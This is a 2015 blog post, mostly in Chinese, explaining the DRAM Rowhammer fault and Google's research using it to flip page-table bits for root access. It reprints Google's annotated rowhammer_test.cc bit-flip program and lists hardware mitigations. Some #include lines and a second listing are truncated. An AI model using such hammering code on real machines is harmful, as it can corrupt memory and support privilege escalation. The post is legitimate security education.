目录
1. Rowhammer Introduction
2. Rowhammer Principle
3. Track And Fix
1. rowhammer introduction
今天的DRAM单元为了让内存容量更大,所以在物理密度上更紧凑,但这样很难阻止临近的内存单元之间的电子上的互相影响,在足够多的访问次数后可以让某个单元的值从1变成0,或者相反
code example
code1a:
mov (X), %eax // Read from address X
mov (Y), %ebx // Read from address Y
clflush (X) // Flush cache for address X
clflush (Y) // Flush cache for address Y
jmp code1a
两个因素导致位的变化
1. 地址选择: 地址X和地址Y必须印射到内存的不同row但是又是在同一bank上,即相邻行
每个DRAM芯片包含了很多行(row)的单元。访问一个byte在内存中涉及到将数据从row传输到芯片的"row buffer"中(放电操作),当读取或者写入row buffer的内容后,再把row buffer内容传输到原来的row单元里(充电操作)。这种"激活"一个row的操作(放电和充电)可以干扰到临近的row。如果这样做足够多的次数,临近row的自动刷新操作(一般是每64ms)可能会让临近row的位产生变化。
row buffer作为缓存,如果地址X和Y指向相同的row,那code1a将会从row buffer中读取信息而不用任何"激活"操作
每个DRAM的bank都有自己的"当前已激活的row",所以如果地址X和地址Y指向不同的bank,code1a将会从那些bank的row buffer中读取信息而不用反复的激活row。所以,如果地址X和地址Y指向同一bank上不同的row,code1a会导致X和Y不断的被激活,这被称为ROWHAMMERING
3. 绕过缓存: 没有了code1a中的CLFLUSH指令的话,内存读操作(mov)只会操作CPU的高速缓存。CLFLUSH刷新缓存的操作强制让内存的访问直接指向DRAM,而这会导致不断有row被重复的激活
The new research by Google shows that these types of errors can be introduced in a predictable manner. A proof-of-concept (POC) exploit that runs on the Linux operating system has been released. Successful exploitation leverages the predictability of these Row Hammer errors to modify memory of an affected device. An authenticated, local attacker with the ability to execute code on the affected system could elevate their privileges to that of a super user or “root” account. This is also known as Ring 0. Programs that run in Ring 0 can modify anything on the affected system.
Relevant Link:
http://linux.cn/article-5030-qqmail.html
http://www.ddrdetective.com/row-hammer/
2. Rowhammer Principle
0x1: Dynamic random-access memory (DRAM)
Dynamic random-access memory (DRAM) contains a two-dimensional array of cells.
在每个存储单元有一个电容器和一个存取晶体管。二进制数据值的两个状态通过电容器的完全充电和完全放电来分别表示
Memory disturbance errors can occur in cases where there is an abnormal interaction between two circuit components that should be isolated from each other. Historically, these memory disturbance errors have been demonstrated by repeatedly accessing (opening, reading, and closing) the same row of memory. This is discussed in detail in the research paper titled
0x2: Privilege Escalation Experiment
the test leverages row hammering to induce a bit flip in a page table entry (PTE) which forces the PTE to point to a physical page containing a page table of the attacking process.
The research uses the concept of memory spraying with the POSIX-compliant Unix system call that maps files or devices into memory — mmap() . The attacker could spray most of physical memory with page tables by using the mmap() system call to a single file repeatedly.
The tests were done with non-ECC memory using the CLFLUSH instruction with a “random address selection” methodology also described in their post.
./make.sh
./rowhammer_test
0x3: Code Analysis
rowhammer_test.cc
#define __STDC_FORMAT_MACROS
#include
#include
#include
#include
#include
#include <string.h>
#include
#include
#include
#include
#include
const size_t mem_size = 1 << 30;
const int toggles = 540000;
char *g_mem;
char *pick_addr()
{
size_t offset = (rand() << 12) % mem_size;
return g_mem + offset;
}
class Timer
{
struct timeval start_time_;
public:
Timer()
{
// Note that we use gettimeofday() (with microsecond resolution)
// rather than clock_gettime() (with nanosecond resolution) so
// that this works on Mac OS X, because OS X doesn't provide
// clock_gettime() and we don't really need nanosecond resolution.
int rc = gettimeofday(&start_time_, NULL);
assert(rc == 0);
}
double get_diff()
{
struct timeval end_time;
int rc = gettimeofday(&end_time, NULL);
assert(rc == 0);
return (end_time.tv_sec - start_time_.tv_sec
+ (double) (end_time.tv_usec - start_time_.tv_usec) / 1e6);
}
void print_iters(uint64_t iterations)
{
double total_time = get_diff();
double iter_time = total_time / iterations;
printf(" %.3f nanosec per iteration: %g sec for %" PRId64 " iterations\n",
iter_time * 1e9, total_time, iterations);
}
};
//读取指定长度的内存bit位,即触发"放电操作"
static void toggle(int iterations, int addr_count)
{
Timer t;
for (int j = 0; j < iterations; j++)
{
uint32_t *addrs[addr_count];
for (int a = 0; a < addr_count; a++)
{
//选取不同row,但是同一bank的内存bit,可能并不一定是相邻行
addrs[a] = (uint32_t *) pick_addr();
}
uint32_t sum = 0;
//循环toggles = 540000次,进行物理内存读取
for (int i = 0; i < toggles; i++)
{
for (int a = 0; a < addr_count; a++)
{
//读取addr_count长度的内存块
sum += *addrs[a] + 1;
}
for (int a = 0; a < addr_count; a++)
{
//清除addr_count长度内存块的对应的CPU高速缓存
asm volatile("clflush (%0)" : : "r" (addrs[a]) : "memory");
}
}
// Sanity check. We don't expect this to fail, because reading
// these rows refreshes them.
if (sum != 0)
{
printf("error: sum=%x\n", sum);
exit(1);
}
}
t.print_iters(iterations * addr_count * toggles);
}
void main_prog()
{
g_mem = (char *) mmap(NULL, mem_size, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
assert(g_mem != MAP_FAILED);
printf("clear\n");
//初始化对应的内存区( [g_mem ~ g_mem + mem_size] )为初始值: 0XFF
memset(g_mem, 0xff, mem_size);
Timer t;
int iter = 0;
//无限循环,在大多数时候,需要触发这个漏洞需要较多的尝试
for (;;)
{
printf("Iteration %i (after %.2fs)\n", iter++, t.get_diff());
//循环10次,每次8byte内存单位
toggle(10, 8);
Timer check_timer;
printf("check\n");
uint64_t *end = (uint64_t *) (g_mem + mem_size);
uint64_t *ptr;
int errors = 0;
for (ptr = (uint64_t *) g_mem; ptr < end; ptr++)
{
uint64_t got = *ptr;
if (got != ~(uint64_t) 0)
{
printf("error at %p: got 0x%" PRIx64 "\n", ptr, got);
errors++;
}
}
printf(" (check took %fs)\n", check_timer.get_diff());
if (errors)
exit(1);
}
}
int main()
{
// In case we are running as PID 1, we fork() a subprocess to run
// the test in. Otherwise, if process 1 exits or crashes, this will
// cause a kernel panic (which can cause a reboot or just obscure
// log output and prevent console scrollback from working).
int pid = fork();
if (pid == 0)
{
main_prog();
_exit(1);
}
int status;
if (waitpid(pid, &status, 0) == pid)
{
printf("** exited with status %i (0x%x)\n", status, status);
}
for (;;)
{
sleep(999);
}
return 0;
}
double_sided_rowhammer.cc
// Small test program to systematically check through the memory to find bit
// flips by double-sided row hammering.
//
// Compilation instructions:
// g++ -std=c++11 [filename]
//
// ./double_sided_rowhammer [-t nsecs] [-p percentage]
//
// Hammers for nsecs seconds, acquires the described fraction of memory (0.0 to 0.9 or so).
#include
#include
#include
#include
#include
#include
#include
Relevant Link:
http://en.wikipedia.org/wiki/Dynamic_random-access_memory
http://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf
https://github.com/google/rowhammer-test
http://en.wikipedia.org/wiki/Row_hammer
3. Track And Fix
This vulnerability exists within hardware and cannot be mitigated by just upgrading software. The following are the widely known mitigations for the Row Hammer issue:
1. Two times (2x) refresh
is a mitigation that has been commonly implemented on server based chipsets from Intel since the introduction of Sandy Bridge and is the suggested default. This reduces the row refresh time by the memory controller from 64ms to 32ms and shrinks the potential window for a row hammer, or other gate pass type memory error to be introduced.
2. Pseudo Target Row Refresh (pTRR)
available in modern memory and chipsets. pTRR does not introduce any performance and power impact.
3. Increased Patrol Scub timers
systems that are equipped with ECC memory will often have a BIOS option that allows the administrator to set an interval at which the CPU will utilize the checksum data stored on each ECC DIMM module to ensure that the contents of memory are valid, and correcting any bit errors that may have been introduced. The number of correctable errors will vary based on architecture and ECC variant. Administrator’s may consider reducing the patrol scrub timers from the standard 20 minute interval to a lower value.
Relevant Link:
http://www.ddrdetective.com/files/3314/1036/5702/Description_of_the_Row_Hammer_feature_on_the_FS2800_DDR_Detective.pdf
http://blogs.cisco.com/security/mitigations-available-for-the-dram-row-hammer-vulnerability
Copyright (c) 2015 LittleHann All rights reserved